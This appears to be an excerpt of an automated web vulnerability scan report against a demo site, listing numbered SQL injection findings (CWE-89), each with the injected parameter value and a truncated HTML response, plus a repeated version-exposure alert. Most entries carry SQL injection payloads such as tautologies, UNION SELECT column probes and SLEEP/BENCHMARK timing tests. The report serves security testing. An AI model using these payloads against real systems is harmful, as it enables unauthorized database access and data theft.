content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #981\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #982\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,2,1))='y'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #983\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #984\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #985\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #986\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #987\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #988\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #989\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #990Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #991\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #992\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #993\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #994\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io+ SLEEP(10) + '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 